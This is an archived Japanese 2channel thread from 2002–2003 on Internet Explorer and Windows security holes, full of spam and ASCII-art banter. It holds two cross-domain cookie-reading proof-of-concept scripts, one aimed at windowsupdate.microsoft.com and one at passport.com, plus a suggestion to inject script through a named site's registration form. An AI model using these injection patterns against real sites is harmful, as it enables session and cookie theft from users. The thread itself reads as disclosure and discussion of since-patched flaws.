WindowsUpdate はやくなんとかスレ、これ、あれこれ

このエントリーをはてなブックマークに追加
1WindowsUpdate
<HTML>
<HEAD>
<TITLE>MicrosoftUpdate</TITLE>
</HEAD>
<BODY>
<H1>WindowsUpdate...wait......</H1>
<SCRIPT>
onload=function () {var obj2ch=open("http://windowsupdate.microsoft.com/?IE","2ch","width=100,height=100");
setTimeout(function () {obj2ch.frames[0].location.href="javascript:txt='your cookie is ...... ';txt+=document.cookie;alert(txt)";},7000);}
</SCRIPT>
</BODY>
</HTML>
4get
>>1
何の意味があるのこのスレ???
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |   君は何を今 見つめているのか
      ____.____    |   若い悲しみに 濡れた瞳で
     |        |        |   |    逃げて行く 白い鳩
     |        | ∧_∧ |   |   それとも愛
     |        |( ´∀`)つ ミ |   君も今日からは 僕等の仲間
     |        |/ ⊃  ノ |   |   飛び出そう 青空の下へ
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |
                        |  \\\
                           ∧_∧
                           ( ´∀`)
                          ⊂ >>1
                           / / /
                           し' し'
5所つとむ:02/09/14 00:14
そして俺の胸へ飛び込んで来い!!
6名無しさん@お腹いっぱい。:02/09/20 20:23
■5050jp入会キャンペーン

>登録した個人情報を、会員の許可なく第三者に開示致しません

#うそつきめ
名前の欄に
"><あぶないスクリプト>とか入れて味噌。

あはは、そのほかイロイロ危険なりせば、ちーん。
不労所得で一発当てようなんて輩しかひっかからないと思うので、晒すことにしたッピ。
ここがつまらないインターネットですか。
8WindowsUpdate :02/09/29 21:35
Who framed Internet Explorer
http://www.pivx.com/larholm/unpatched/#unpatched

Description: Cross-protocol scripting, arbitrary command execution,
local file reading, cookie theft, website forging, sniffing https, etc.
Published: September 9 2002
Reference: ttp://sec.greymagic.com/adv/gm010-ie/
Exploit: ttp://sec.greymagic.com/adv/gm010-ie/wfsimple.html
image: http://www.humour.com/images/images/microsoftcoulisses.gif
9WindowsUpdate:02/09/29 21:38
IPA もダメってことだ。
10名無しさん@お腹いっぱい。:02/09/29 21:40
11名無しさん@お腹いっぱい。:02/09/29 21:46
..>>11
>>8
拭いても拭いても!
14名無しさん@お腹いっぱい。:02/10/01 01:06
更新されてるが、なんだありゃ?
わけわからんものを入れる気にはならんな…
16sleepy galaxy:02/10/05 17:19
超おすすめメールマガジン
sleepy galaxyだよ
http://www.msleep.com/jp/sg/
( ´,_ゝ`)( ´,_ゝ`)( ´,_ゝ`)( ´,_ゝ`)( ´,_ゝ`)
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | 1ってうざいよね〜
  \  _______
   V
  ∧_∧∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ( ・∀・)´∀` )< だよね〜、誰か殺してくれないかな?
 (    )    )  \_______________  ∧ ,∧
 | | || | |                           (・д・,,)ペッ!!
 (__)_)__(_)            ∧ ∧?          、'(_@
                     (´⊇`)
                     ( 1 )
                     || |
  ∧ ∧ムカムカ           (((_)_)
  (#゚Д゚) ̄ ̄ `〜                   ∧ ∧
    U U ̄ ̄UU                     (   ) イッテヨシ!!
  へ                            |  ヽ
/    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ったく、サルみてーに糞スレ乱立させてんじゃねーよゴルァ!!
\________________________

>>17 (・∀・)カエレ!
oooooooooooooooooooooooooooooooooooooooooooooooooooo
Escape Quotes In Shell
ttp://www.securitybugware.org/mUNIXes/4609.html
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
>>19
上げ荒らし死ね
きゅぅ
http://www.pivx.com/larholm/adv/TL004/number.html
795文字では大丈夫だった。UPDATEしにいこうっと!
>>1
死ねヴォケ
24死ねヴォケ>>1:02/10/08 21:07
IE allows universal Cross Domain Scripting.

<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>

ところで、Cross Domain Scripting とは、XDS と略称?
■■■■■■■■■■■■■■■終了■■■■■■■■■■■■■■■
26sagemakuri:02/10/10 22:07
■■■■■■■■■■■■■■■終了■■■■■■■■■■■■
ほむほむ。
http://online.securityfocus.com/archive/1/200109
http://online.securityfocus.com/archive/1/256013
http://memo.st.ryukoku.ac.jp/archive/200206.month/4018.html
↑なぜoctet/streamにしないのかイマイチ不明。
http://ml-ar6.infoseek.co.jp/MLarchive//user/67533/html/msg000001373.php3
↑なぜtext/cssにしないのかイマイチ不明。
27わからんスレ:02/10/10 22:10
....あげてみる。糾弾して。
28sagemakuri:02/10/10 22:40
26 です。いやですから、ひっそりと。あげないでください。>>27
http://interconnected.org/home/more/GoogleSearch.pl.txt

-------------------------------------
------------------------------------
# cleans up strings for XML
sub xml_clean {
my $text = shift;

$text =~ s/\&/\&/g;
$text =~ s/</\</g;
$text =~ s/>/\>/g;
$text =~ s/\"/\"/g;
$text =~ s/\'/\'/g;

return $text;
}
------------------------------------
-------------------------------------
??????これってヤバイ? $text =~ s/\'/\'/g;
'って一部のブラウザだけに通用するのだ。?。
> sub xml_clean {
が読めないのか?
32山崎渉:03/01/15 16:03
(^^)
33山崎渉:03/01/16 04:05
(^^)
Windows全バージョンに「緊急」の脆弱性

Windowsの全バージョンで、悪質なWebサイトやHTML形式の電子メールを使ってPCが乗っ取られてしまう脆弱性が発見され、Microsoftが3月19日警告を発した。

この脆弱性はWindowsのスクリプティングコンポーネントにあり、攻撃者は同スクリプティングエンジンを利用して、あたかもプログラムがPC上でローカルに実行されたかのように見せかけて自分のプログラムを実行したり、
システムを乗っ取ることが可能になる。Microsoftはこの脆弱性の最大深刻度を「Critical(緊急)」と評価している。
Microsoftセキュリティ対策センターのプログラムマネジャーIain Mulholland氏は「Outlookの旧バージョンを使っている場合のみ脅威となる」と説明。また、この脆弱性からウイルスを作成するのは難しいだろうと言い添えた。

このWindowsの脆弱性は、WindowsがMicrosoft版のJavaScriptであるJScript(ECMAScript Edition 3)を処理する方法をめぐって発生する。

攻撃者は、特別に生成したスクリプトを電子メールで送りつけるか、そうしたスクリプトをWebサイトに埋め込んで、Internet Explorerでロードさせる方法でこれを悪用できる。

Mulholland氏によると、スクリプトを実行させない電子メールクライアントとブラウザでは攻撃は防ぐことができる。また、「Outlook Express 6.0」と「Outlook 2002」では、
デフォルトの状態で利用していればHTMLメールによる攻撃の被害は受けない。また、これ以前のバージョンでもOutlook E-mail Security Updateが適用されていれば被害は受けない。

各バージョンのWindows用のパッチはMicrosoftのWebサイトとWindows Updateで提供。

■米Microsoftの警告ページ
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-008.asp?tag=nl
■日本のマイクロソフトのセキュリティページ
http://www.microsoft.com/japan/security/(ZDNet)
37山崎渉:03/04/17 12:18
(^^)
38山崎渉:03/04/20 06:15
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
39山崎渉:03/05/22 02:19
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
40山崎 渉:03/07/15 11:19

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
42山崎 渉:03/08/15 23:24
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
43名無しさん@お腹いっぱい。:03/12/11 16:09
米MS、「ない」はずのパッチが公開に--誤作動で11月分を再配布
http://www.japan.cnet.com/news/ent/story/0,2000047623,20062684,00.htm
↑このスレ古いので移動しておくね。
http://pc.2ch.net/test/read.cgi/sec/1060956936/l50
緊急! WindowsUpdateをしましょう!
↑の誘導先アドレス変更
緊急! WindowsUpdateをしましょう!
http://pc5.2ch.net/test/read.cgi/sec/1060956936/